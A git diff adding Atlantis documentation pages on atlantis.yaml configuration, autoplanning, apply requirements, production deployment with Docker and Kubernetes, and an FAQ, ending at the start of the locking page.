+* [Pull Request Commands](pull-request-commands.html) - the commands that Atlantis supports via pull request comments.
+* [Production-Ready Deployment](deployment.html) - how to deploy Atlantis.
+* [Server Configuration](server-configuration.html) - how to configure the Atlantis server.
+* [Apply Requirements](apply-requirements.html) - what requirements can be set before `atlantis apply` is allowed.
+* [Locking](locking.html) - how and why Atlantis does locking.
+* [Autoplanning](autoplanning.html) - how Atlantis runs plan automatically.
+* [`atlantis.yaml` Reference](atlantis-yaml-reference.html) - reference docs for the `atlantis.yaml` configuration file.
+* [Security](security.html) - what you need to think about in terms of security for Atlantis.
+* [FAQ](faq.html) - Frequently asked questions.
+
+
+
+
+
+
diff --git a/runatlantis.io/docs/apply-requirements.md b/runatlantis.io/docs/apply-requirements.md
new file mode 100644
index 0000000000..8f409a6439
--- /dev/null
+++ b/runatlantis.io/docs/apply-requirements.md
@@ -0,0 +1,22 @@
+# Apply Requirements
+
+## Approved
+If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply`, simply run Atlantis with the `--require-approval` flag.
+By default, no approval is required. If you want to configure this on a per-repo/project basis, for example to only require approvals for your production
+configuration, you must use an `atlantis.yaml` file:
+```yaml
+version: 2
+projects:
+- dir: .
+  apply_requirements: [approved]
+```
+
+::: danger
+Please be aware that in GitHub **any user with read permissions** can approve a pull request.
+
+In GitLab, you [can set](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html#editing-approvals) who is allowed to approve.
+:::
+
+## Next Steps
+* For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
+* For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
\ No newline at end of file
diff --git a/runatlantis.io/docs/atlantis-yaml-reference.md b/runatlantis.io/docs/atlantis-yaml-reference.md
new file mode 100644
index 0000000000..a2fbe21755
--- /dev/null
+++ b/runatlantis.io/docs/atlantis-yaml-reference.md
@@ -0,0 +1,184 @@
+# atlantis.yaml Reference
+[[toc]]
+
+::: tip Do I need an atlantis.yaml file?
+`atlantis.yaml` files are only required if you wish to customize some aspect of Atlantis.
+:::
+
+::: tip Where are the example use cases?
+See [www.runatlantis.io/guide/atlantis-yaml-use-cases.html](../guide/atlantis-yaml-use-cases.html)
+:::
+
+## Enabling atlantis.yaml
+The Atlantis server must be running with `--allow-repo-config` to allow Atlantis
+to use `atlantis.yaml` files.
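+
+If you're configuring the server with a YAML config file (passed via the `--config` flag) instead of
+CLI flags, the equivalent entry is a one-line sketch (the file name here is arbitrary):
+```yaml
+# config.yaml: server-side config file, not the repo's atlantis.yaml
+allow-repo-config: true
+```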
+
+## Example Using All Keys
+```yaml
+version: 2
+projects:
+- name: my-project-name
+  dir: .
+  workspace: default
+  terraform_version: v0.11.0
+  autoplan:
+    when_modified: ["*.tf", "../modules/**.tf"]
+    enabled: true
+  apply_requirements: [approved]
+  workflow: myworkflow
+workflows:
+  myworkflow:
+    plan:
+      steps:
+      - run: my-custom-command arg1 arg2
+      - init
+      - plan:
+          extra_args: ["-lock", "false"]
+      - run: my-custom-command arg1 arg2
+    apply:
+      steps:
+      - run: echo hi
+      - apply
+```
+
+## Usage Notes
+* `atlantis.yaml` files must be placed at the root of the repo
+* The only supported name is `atlantis.yaml`. Not `atlantis.yml` or `.atlantis.yaml`.
+* Once an `atlantis.yaml` file exists in a repo, Atlantis will not automatically plan
+any projects that aren't listed in it. This means that if you have multiple projects in the same repo,
+you'll need to add an entry for each project once you add an `atlantis.yaml` (see the sketch below).
+* Atlantis uses the `atlantis.yaml` version from the pull request.
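+
+For example, a minimal sketch of an `atlantis.yaml` listing two projects (the directory names are hypothetical):
+```yaml
+version: 2
+projects:
+- dir: project1
+- dir: project2
+  workspace: staging
+```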
+
+## Security
+`atlantis.yaml` files allow users to run arbitrary code on the Atlantis server.
+This is obviously extremely powerful and dangerous since the Atlantis server will
+likely hold your highest privilege credentials.
+
+The risk is increased because Atlantis uses the `atlantis.yaml` file from the
+pull request so anyone that can submit a pull request can submit a malicious file.
+
+As such, **`atlantis.yaml` files should only be enabled in a trusted environment**.
+
+::: danger
+It should be noted that `atlantis apply` itself could be exploited if run on a malicious file. See [Security](security.html#exploits).
+:::
+
+## Reference
+### Top-Level Keys
+```yaml
+version:
+projects:
+workflows:
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| version | int | none | yes | This key is required and must be set to `2`|
+| projects | array[[Project](atlantis-yaml-reference.html#project)] | [] | no | Lists the projects in this repo |
+| workflows | map[string -> [Workflow](atlantis-yaml-reference.html#workflow)] | {} | no | Custom workflows |
+
+### Project
+```yaml
+name: myname
+dir: mydir
+workspace: myworkspace
+autoplan:
+terraform_version: 0.11.0
+apply_requirements: ["approved"]
+workflow: myworkflow
+```
+
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| name | string | none | maybe | Required if there is more than one project with the same `dir` and `workspace`. This project name can be used with the `-p` flag.|
+| dir | string | none | yes | The directory of this project relative to the repo root. Use `.` for the root. For example if the project was under `./project1` then use `project1`|
+| workspace | string | default | no | The [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) for this project. Atlantis will switch to this workspace when planning/applying and will create it if it doesn't exist.|
+| autoplan | [Autoplan](atlantis-yaml-reference.html#autoplan) | none | no | A custom autoplan configuration. If not specified, will use the default algorithm. See [Autoplanning](autoplanning.html).|
+| terraform_version | string | none | no | A specific Terraform version to use when running commands for this project. Requires there to be a binary in the Atlantis `PATH` with the name `terraform{VERSION}`, ex. `terraform0.11.0`|
+| apply_requirements | array[string] | [] | no | Requirements that must be satisfied before `atlantis apply` can be run. Currently the only supported requirement is `approved`. See [Apply Requirements](apply-requirements.html#approved) for more details.|
+| workflow | string | none | no | A custom workflow. If not specified, Atlantis will use its default workflow.|
+
+::: tip
+A project represents a Terraform state. Typically, there is one state per directory and workspace; however, it's possible to
+have multiple states in the same directory using `terraform init -backend-config=custom-config.tfvars` (see the sketch after this tip).
+Atlantis supports this but requires the `name` key to be specified. See [atlantis.yaml Use Cases](../guide/atlantis-yaml-use-cases.html#custom-backend-config) for more details.
+:::
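+
+As a sketch of that setup (the project names and backend-config file names here are hypothetical):
+```yaml
+version: 2
+projects:
+- name: project1-staging
+  dir: project1
+  workflow: staging
+- name: project1-production
+  dir: project1
+  workflow: production
+workflows:
+  staging:
+    plan:
+      steps:
+      - init:
+          extra_args: [-backend-config=staging.backend.tfvars]
+      - plan
+  production:
+    plan:
+      steps:
+      - init:
+          extra_args: [-backend-config=production.backend.tfvars]
+      - plan
+```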
+
+### Autoplan
+```yaml
+enabled: true
+when_modified: ["*.tf"]
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| enabled | boolean | true | no | Whether autoplanning is enabled for this project. |
+| when_modified | array[string] | none | no | Uses [.dockerignore](https://docs.docker.com/engine/reference/builder/#dockerignore-file) syntax. If any modified file in the pull request matches, this project will be planned. If not specified, Atlantis will use its own algorithm. See [Autoplanning](autoplanning.html). Paths are relative to the project's dir.|
+
+### Workflow
+```yaml
+plan:
+apply:
+```
+
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| plan | [Stage](atlantis-yaml-reference.html#stage) | `steps: [init, plan]` | no | How to plan for this project. |
+| apply | [Stage](atlantis-yaml-reference.html#stage) | `steps: [apply]` | no | How to apply for this project. |
+
+### Stage
+```yaml
+steps:
+- run: custom-command
+- init
+- plan:
+    extra_args: [-lock=false]
+```
+
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| steps | array[[Step](atlantis-yaml-reference.html#step)] | `[]` | no | List of steps for this stage. If the steps key is empty, no steps will be run for this stage. |
+
+### Step
+#### Built-In Command
+Steps can be a single string for a built-in command.
+```yaml
+- init
+- plan
+- apply
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| init/plan/apply | string | none | no | Use a built-in command without additional configuration. Only `init`, `plan` and `apply` are supported|
+
+#### Built-In Command With Extra Args
+A map from string to `extra_args` for a built-in command with extra arguments.
+```yaml
+- init:
+    extra_args: [arg1, arg2]
+- plan:
+    extra_args: [arg1, arg2]
+- apply:
+    extra_args: [arg1, arg2]
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| init/plan/apply | map[`extra_args` -> array[string]] | none | no | Use a built-in command and append `extra_args`. Only `init`, `plan` and `apply` are supported as keys and only `extra_args` is supported as a value|
+
+#### Custom Command
+Or a custom command:
+```yaml
+- run: custom-command
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| run | string| none | no | Run a custom command|
+
+::: tip
+`run` steps are executed with the following environment variables:
+* `WORKSPACE` - The Terraform workspace used for this project, ex. `default`.
+ * NOTE: if the step is executed before `init` then Atlantis won't have switched to this workspace yet.
+* `ATLANTIS_TERRAFORM_VERSION` - The version of Terraform used for this project, ex. `0.11.0`.
+* `DIR` - Absolute path to the current directory.
+:::
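+
+For example, a workflow could reference these variables from a `run` step (a sketch; the `echo` command is illustrative only):
+```yaml
+workflows:
+  myworkflow:
+    plan:
+      steps:
+      - init
+      - run: echo "planning in $DIR on workspace $WORKSPACE with terraform $ATLANTIS_TERRAFORM_VERSION"
+      - plan
+```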
+
+## Next Steps
+Check out the [atlantis.yaml Use Cases](../guide/atlantis-yaml-use-cases.html) for
+some real world examples.
diff --git a/runatlantis.io/docs/autoplanning.md b/runatlantis.io/docs/autoplanning.md
new file mode 100644
index 0000000000..8260ed98b2
--- /dev/null
+++ b/runatlantis.io/docs/autoplanning.md
@@ -0,0 +1,39 @@
+# Autoplanning
+On any **new** pull request or **new commit** to an existing pull request, Atlantis will attempt to
+run `terraform plan` in the directories it thinks hold modified Terraform projects.
+
+The algorithm it uses is as follows:
+1. Get list of all modified files in pull request
+1. Filter to those containing `.tf`
+1. Get the directories that those files are in
+1. If the directory path doesn't contain `modules/` then try to run `plan` in that directory
+1. If it does contain `modules/` look at the directory one level above `modules/`. If it
+contains a `main.tf` run plan in that directory, otherwise ignore the change.
+
+## Example
+Given the directory structure:
+```
+.
+├── modules
+│   └── module1
+│       └── main.tf
+└── project1
+    ├── main.tf
+    └── modules
+        └── module1
+            └── main.tf
+```
+
+* If `project1/main.tf` were modified, we would run `plan` in `project1`
+* If `modules/module1/main.tf` were modified, we would not automatically run `plan` because we couldn't determine the location of the terraform project
+ * You could use an [atlantis.yaml](../guide/atlantis-yaml-use-cases.html#configuring-autoplanning) file to specify which projects to plan when this module changed
+  * Or you could manually plan with `atlantis plan -d <dir>`
+* If `project1/modules/module1/main.tf` were modified, we would look one level above `project1/modules`
+into `project1/`, see that there is a `main.tf` file, and so run plan in `project1/`
+
+## Customizing
+If you would like to customize how Atlantis determines which directory to run in,
+or disable autoplanning altogether, you need to create an `atlantis.yaml` file.
+See:
+* [Disabling Autoplanning](../guide/atlantis-yaml-use-cases.html#disabling-autoplanning)
+* [Configuring Autoplanning](../guide/atlantis-yaml-use-cases.html#configuring-autoplanning)
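+
+For example, to keep autoplanning on for `project1` and also re-plan it whenever the shared
+module above changes, a sketch of the repo's `atlantis.yaml` (paths match the example layout above):
+```yaml
+version: 2
+projects:
+- dir: project1
+  autoplan:
+    when_modified: ["*.tf", "../modules/module1/*.tf"]
+```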
diff --git a/runatlantis.io/docs/deployment.md b/runatlantis.io/docs/deployment.md
new file mode 100644
index 0000000000..d40dcb91c5
--- /dev/null
+++ b/runatlantis.io/docs/deployment.md
@@ -0,0 +1,386 @@
+# Production-Ready Deployment
+[[toc]]
+## Install Terraform
+`terraform` needs to be in the `$PATH` for Atlantis.
+Download from https://www.terraform.io/downloads.html
+```bash
+unzip path/to/terraform_*.zip -d /usr/local/bin
+```
+Check that it's in your `$PATH`
+```
+$ terraform version
+Terraform v0.10.0
+```
+If you want to use a different version of Terraform see [Terraform Versions](#terraform-versions)
+
+## Hosting Atlantis
+Atlantis needs to be hosted somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach. Developers in your organization also need to be able to access Atlantis to view the UI and to delete locks.
+
+By default Atlantis runs on port `4141`. This can be changed with the `--port` flag.
+
+## Add GitHub Webhook
+Once you've decided where to host Atlantis you can add it as a Webhook to GitHub.
+If you already have a GitHub organization we recommend installing the webhook at the **organization level** rather than on each repository, however both methods will work.
+
+::: tip
+If you're not sure if you have a GitHub organization see https://help.github.com/articles/differences-between-user-and-organization-accounts/
+:::
+
+If you're installing on the organization, navigate to your organization's page and click **Settings**.
+If installing on a single repository, navigate to the repository home page and click **Settings**.
+- Select **Webhooks** or **Hooks** in the sidebar
+- Click **Add webhook**
+- set **Payload URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
+- set **Content type** to `application/json`
+- set **Secret** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gh-webhook-secret` flag when you start Atlantis
+- select **Let me select individual events**
+- check the boxes
+ - **Pull request reviews**
+ - **Pushes**
+ - **Issue comments**
+ - **Pull requests**
+- leave **Active** checked
+- click **Add webhook**
+
+## Add GitLab Webhook
+If you're using GitLab, navigate to your project's home page in GitLab
+- Click **Settings > Integrations** in the sidebar
+- set **URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
+- set **Secret Token** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gitlab-webhook-secret` flag when you start Atlantis
+- check the boxes
+ - **Push events**
+ - **Comments**
+ - **Merge Request events**
+- leave **Enable SSL verification** checked
+- click **Add webhook**
+
+## Create a GitHub Token
+We recommend creating a new user in GitHub named **atlantis** that performs all API actions; however, you can use any user.
+
+**NOTE: The Atlantis user must have "Write permissions" (for repos in an organization) or be a "Collaborator" (for repos in a user account) to be able to set commit statuses:**
+![Atlantis status](./images/status.png)
+
+Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
+- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token)
+- copy the access token
+
+## Create a GitLab Token
+We recommend creating a new user in GitLab named **atlantis** that performs all API actions; however, you can use any user.
+Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
+- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token)
+- create a token with **api** scope
+- copy the access token
+
+## Start Atlantis
+Now you're ready to start Atlantis!
+
+If you're using GitHub, run:
+```
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
+```
+
+If you're using GitHub Enterprise, run:
+```
+HOSTNAME=YOUR_GITHUB_ENTERPRISE_HOSTNAME # ex. github.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $HOSTNAME
+```
+
+If you're using GitLab, run:
+```
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
+```
+
+If you're using GitLab Enterprise, run:
+```
+HOSTNAME=YOUR_GITLAB_ENTERPRISE_HOSTNAME # ex. gitlab.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET --gitlab-hostname $HOSTNAME
+```
+
+- `$URL` is the URL that Atlantis can be reached at
+- `$USERNAME` is the GitHub/GitLab username you generated the token for
+- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN`
+- `$SECRET` is the random key you used for the webhook secret. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
+
+Atlantis is now running!
+**We recommend running it under something like Systemd or Supervisord.**
+
+## Docker
+Atlantis also ships inside a Docker image. Run the Docker image:
+
+```bash
+docker run runatlantis/atlantis:latest server
+```
+
+### Usage
+If you need to modify the Docker image that we provide, for instance to add a specific version of Terraform, you can do something like this:
+
+* Create a custom docker file
+```bash
+vim Dockerfile-custom
+```
+
+```dockerfile
+FROM runatlantis/atlantis
+
+# copy a terraform binary of the version you need
+COPY terraform /usr/local/bin/terraform
+```
+
+* Build docker image
+
+```bash
+docker build -t {YOUR_DOCKER_ORG}/atlantis-custom -f Dockerfile-custom .
+```
+
+* Run docker image
+
+```bash
+docker run {YOUR_DOCKER_ORG}/atlantis-custom server --gh-user=GITHUB_USERNAME --gh-token=GITHUB_TOKEN
+```
+
+## Kubernetes
+Atlantis can be deployed into Kubernetes as a
+[Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/)
+or as a [Statefulset](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) with persistent storage.
+
+StatefulSet is recommended because Atlantis stores its data on disk and so if your Pod dies
+or you upgrade Atlantis, you won't lose the data. On the other hand, the only data that
+Atlantis has right now is any plans that haven't been applied and Atlantis locks. If
+Atlantis loses that data, you just need to run `atlantis plan` again so it's not the end of the world.
+
+Regardless of whether you choose a Deployment or StatefulSet, first create a Secret with the webhook secret and access token:
+```
+echo -n "yourtoken" > token
+echo -n "yoursecret" > webhook-secret
+kubectl create secret generic atlantis-vcs --from-file=token --from-file=webhook-secret
+```
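+
+Equivalently, you can create the same Secret from a manifest (a sketch with the placeholder values shown inline):
+```yaml
+apiVersion: v1
+kind: Secret
+metadata:
+  name: atlantis-vcs
+stringData:
+  token: yourtoken
+  webhook-secret: yoursecret
+```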
+
+Next, edit the manifests below as follows:
+1. Replace `<VERSION>` in `image: runatlantis/atlantis:<VERSION>` with the most recent version from https://github.com/runatlantis/atlantis/releases/latest.
+ * NOTE: You never want to run with `:latest` because if your Pod moves to a new node, Kubernetes will pull the latest image and you might end
+up upgrading Atlantis by accident!
+2. Replace `value: github.com/yourorg/*` under `name: ATLANTIS_REPO_WHITELIST` with the whitelist pattern
+for your Terraform repos. See [--repo-whitelist](#--repo-whitelist) for more details.
+3. If you're using GitHub:
+    1. Replace `<GITHUB_USERNAME>` with the username of your Atlantis GitHub user without the `@`.
+ 2. Delete all the `ATLANTIS_GITLAB_*` environment variables.
+4. If you're using GitLab:
+    1. Replace `<GITLAB_USERNAME>` with the username of your Atlantis GitLab user without the `@`.
+ 2. Delete all the `ATLANTIS_GH_*` environment variables.
+
+### StatefulSet Manifest
+<details>
+ <summary>Show...</summary>
+
+```yaml
+apiVersion: apps/v1
+kind: StatefulSet
+metadata:
+  name: atlantis
+spec:
+  serviceName: atlantis
+  replicas: 1
+  updateStrategy:
+    type: RollingUpdate
+    rollingUpdate:
+      partition: 0
+  selector:
+    matchLabels:
+      app: atlantis
+  template:
+    metadata:
+      labels:
+        app: atlantis
+    spec:
+      securityContext:
+        fsGroup: 1000 # Atlantis group (1000) read/write access to volumes.
+      containers:
+      - name: atlantis
+        image: runatlantis/atlantis:v<VERSION> # 1. Replace <VERSION> with the most recent release.
+        env:
+        - name: ATLANTIS_REPO_WHITELIST
+          value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
+
+        ## GitHub Config ###
+        - name: ATLANTIS_GH_USER
+          value: <GITHUB_USERNAME> # 3i. If you're using GitHub replace with the username of your Atlantis GitHub user without the `@`.
+        - name: ATLANTIS_GH_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GH_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        ## GitLab Config ###
+        - name: ATLANTIS_GITLAB_USER
+          value: <GITLAB_USERNAME> # 4i. If you're using GitLab replace with the username of your Atlantis GitLab user without the `@`.
+        - name: ATLANTIS_GITLAB_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        - name: ATLANTIS_DATA_DIR
+          value: /atlantis
+        - name: ATLANTIS_PORT
+          value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
+        volumeMounts:
+        - name: atlantis-data
+          mountPath: /atlantis
+        ports:
+        - name: atlantis
+          containerPort: 4141
+        resources:
+          requests:
+            memory: 256Mi
+            cpu: 100m
+          limits:
+            memory: 256Mi
+            cpu: 100m
+  volumeClaimTemplates:
+  - metadata:
+      name: atlantis-data
+    spec:
+      accessModes: ["ReadWriteOnce"] # Volume should not be shared by multiple nodes.
+      resources:
+        requests:
+          # The biggest thing Atlantis stores is the Git repo when it checks it out.
+          # It deletes the repo after the pull request is merged.
+          storage: 5Gi
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: atlantis
+spec:
+  ports:
+  - name: atlantis
+    port: 80
+    targetPort: 4141
+  selector:
+    app: atlantis
+```
+</details>
+
+
+### Deployment Manifest
+<details>
+ <summary>Show...</summary>
+
+```yaml
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: atlantis
+  labels:
+    app: atlantis
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: atlantis
+  template:
+    metadata:
+      labels:
+        app: atlantis
+    spec:
+      containers:
+      - name: atlantis
+        image: runatlantis/atlantis:v<VERSION> # 1. Replace <VERSION> with the most recent release.
+        env:
+        - name: ATLANTIS_REPO_WHITELIST
+          value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
+
+        ## GitHub Config ###
+        - name: ATLANTIS_GH_USER
+          value: <GITHUB_USERNAME> # 3i. If you're using GitHub replace with the username of your Atlantis GitHub user without the `@`.
+        - name: ATLANTIS_GH_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GH_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+
+        ## GitLab Config ###
+        - name: ATLANTIS_GITLAB_USER
+          value: <GITLAB_USERNAME> # 4i. If you're using GitLab replace with the username of your Atlantis GitLab user without the `@`.
+        - name: ATLANTIS_GITLAB_TOKEN
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: token
+        - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
+          valueFrom:
+            secretKeyRef:
+              name: atlantis-vcs
+              key: webhook-secret
+        - name: ATLANTIS_PORT
+          value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
+        ports:
+        - name: atlantis
+          containerPort: 4141
+        resources:
+          requests:
+            memory: 256Mi
+            cpu: 100m
+          limits:
+            memory: 256Mi
+            cpu: 100m
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: atlantis
+spec:
+  ports:
+  - name: atlantis
+    port: 80
+    targetPort: 4141
+  selector:
+    app: atlantis
+```
+</details>
+
+### Routing and SSL
+The manifests above create a Kubernetes `Service` of type `ClusterIP` which isn't accessible outside your cluster.
+Depending on how you're doing routing into Kubernetes, you may want to use a `LoadBalancer` so that Atlantis is accessible
+to GitHub/GitLab and your internal users.
+
+If you want to add SSL you can use something like https://github.com/jetstack/cert-manager to generate SSL
+certs and mount them into the Pod. Then set the `ATLANTIS_SSL_CERT_FILE` and `ATLANTIS_SSL_KEY_FILE` environment variables to enable SSL.
+You could also set up SSL at your LoadBalancer.
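+
+For example, if the certs are mounted into the Pod you would add env vars like these to the
+container spec in the manifests above (a sketch; the mount path is hypothetical):
+```yaml
+        - name: ATLANTIS_SSL_CERT_FILE
+          value: /etc/atlantis/ssl/tls.crt
+        - name: ATLANTIS_SSL_KEY_FILE
+          value: /etc/atlantis/ssl/tls.key
+```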
+
+## AWS Fargate
+
+If you'd like to run Atlantis on [AWS Fargate](https://aws.amazon.com/fargate/) check out the Atlantis module on the Terraform Module Registry: https://registry.terraform.io/modules/terraform-aws-modules/atlantis/aws
+
+## Testing Out Atlantis on GitHub
+
+If you'd like to test out Atlantis before running it on your own repositories you can fork our example repo.
+
+- Fork https://github.com/runatlantis/atlantis-example
+- If you didn't add the webhook at the organization level, add Atlantis as a webhook to the forked repo (see [Add GitHub Webhook](#add-github-webhook))
+- Now that Atlantis can receive events you should be able to comment on a pull request to trigger Atlantis. Create a pull request
+ - Click **Branches** on your forked repo's homepage
+ - click the **New pull request** button next to the `example` branch
+ - Change the `base` to `{your-repo}/master`
+ - click **Create pull request**
+- Now you can test out Atlantis
+ - Create a comment `atlantis help` to see what commands you can run from the pull request
+ - `atlantis plan` will run `terraform plan` behind the scenes. You should see the output commented back on the pull request. You should also see some logs show up where you're running `atlantis server`
+ - `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do.
+
+
diff --git a/runatlantis.io/docs/faq.md b/runatlantis.io/docs/faq.md
new file mode 100644
index 0000000000..379bd74e99
--- /dev/null
+++ b/runatlantis.io/docs/faq.md
@@ -0,0 +1,28 @@
+# FAQ
+**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?**
+
+A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`.
+
+**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?**
+
+A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening.
+
+Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands.
+
+**Q: How do I run Atlantis in high availability mode? Does it need to be?**
+
+A: The Atlantis server can easily be run under the supervision of an init system like `upstart` or `systemd` to make sure `atlantis server` is always running.
+
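+Below is a minimal sketch of a `systemd` unit, assuming Atlantis is installed at `/usr/local/bin/atlantis` and reads its flags from a config file (both paths are assumptions; adjust for your setup):
+
+```bash
+# Write a basic systemd unit for Atlantis and start it.
+sudo tee /etc/systemd/system/atlantis.service > /dev/null <<'EOF'
+[Unit]
+Description=Atlantis Terraform automation server
+After=network.target
+
+[Service]
+User=atlantis
+ExecStart=/usr/local/bin/atlantis server --config /etc/atlantis/config.yaml
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target
+EOF
+sudo systemctl daemon-reload
+sudo systemctl enable --now atlantis
+```
+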
+Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently.
+
+However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway.
+
+**Q: How do I add SSL to the Atlantis server?**
+
+A: First, you'll need to get a public/private key pair to serve over SSL.
+These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags.
+See `atlantis server --help` for more information.
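+
+For example, a sketch using a self-signed certificate (fine for testing; the hostname and file names here are placeholders):
+
+```bash
+# Generate a self-signed cert/key pair, then start Atlantis with SSL enabled
+# (add your usual server flags).
+openssl req -x509 -newkey rsa:4096 -nodes -days 365 \
+  -subj "/CN=atlantis.example.com" \
+  -keyout atlantis.key -out atlantis.crt
+atlantis server --ssl-cert-file=atlantis.crt --ssl-key-file=atlantis.key
+```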
+
+**Q: How can I get Atlantis up and running on AWS?**
+
+A: The [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project hosts complete Terraform configurations for running Atlantis on AWS Fargate. It is tested and maintained.
\ No newline at end of file
diff --git a/runatlantis.io/docs/images/lock-comment.png b/runatlantis.io/docs/images/lock-comment.png
new file mode 100644
index 0000000000..a7c2a8f506
Binary files /dev/null and b/runatlantis.io/docs/images/lock-comment.png differ
diff --git a/runatlantis.io/docs/images/lock-delete-comment.png b/runatlantis.io/docs/images/lock-delete-comment.png
new file mode 100644
index 0000000000..db452bf568
Binary files /dev/null and b/runatlantis.io/docs/images/lock-delete-comment.png differ
diff --git a/runatlantis.io/docs/images/lock-detail-ui.png b/runatlantis.io/docs/images/lock-detail-ui.png
new file mode 100644
index 0000000000..942c790710
Binary files /dev/null and b/runatlantis.io/docs/images/lock-detail-ui.png differ
diff --git a/runatlantis.io/docs/images/locks-ui.png b/runatlantis.io/docs/images/locks-ui.png
new file mode 100644
index 0000000000..ef25124c9d
Binary files /dev/null and b/runatlantis.io/docs/images/locks-ui.png differ
diff --git a/docs/pr-comment-apply.png b/runatlantis.io/docs/images/pr-comment-apply.png
similarity index 100%
rename from docs/pr-comment-apply.png
rename to runatlantis.io/docs/images/pr-comment-apply.png
diff --git a/docs/pr-comment-help.png b/runatlantis.io/docs/images/pr-comment-help.png
similarity index 100%
rename from docs/pr-comment-help.png
rename to runatlantis.io/docs/images/pr-comment-help.png
diff --git a/docs/pr-comment-plan.png b/runatlantis.io/docs/images/pr-comment-plan.png
similarity index 100%
rename from docs/pr-comment-plan.png
rename to runatlantis.io/docs/images/pr-comment-plan.png
diff --git a/docs/status.png b/runatlantis.io/docs/images/status.png
similarity index 100%
rename from docs/status.png
rename to runatlantis.io/docs/images/status.png
diff --git a/runatlantis.io/docs/locking.md b/runatlantis.io/docs/locking.md
new file mode 100644
index 0000000000..55615c76af
--- /dev/null
+++ b/runatlantis.io/docs/locking.md
@@ -0,0 +1,66 @@
+# Locking
+When `plan` is run, the directory and Terraform workspace are **Locked** until the pull request is merged or the plan is manually deleted.
+
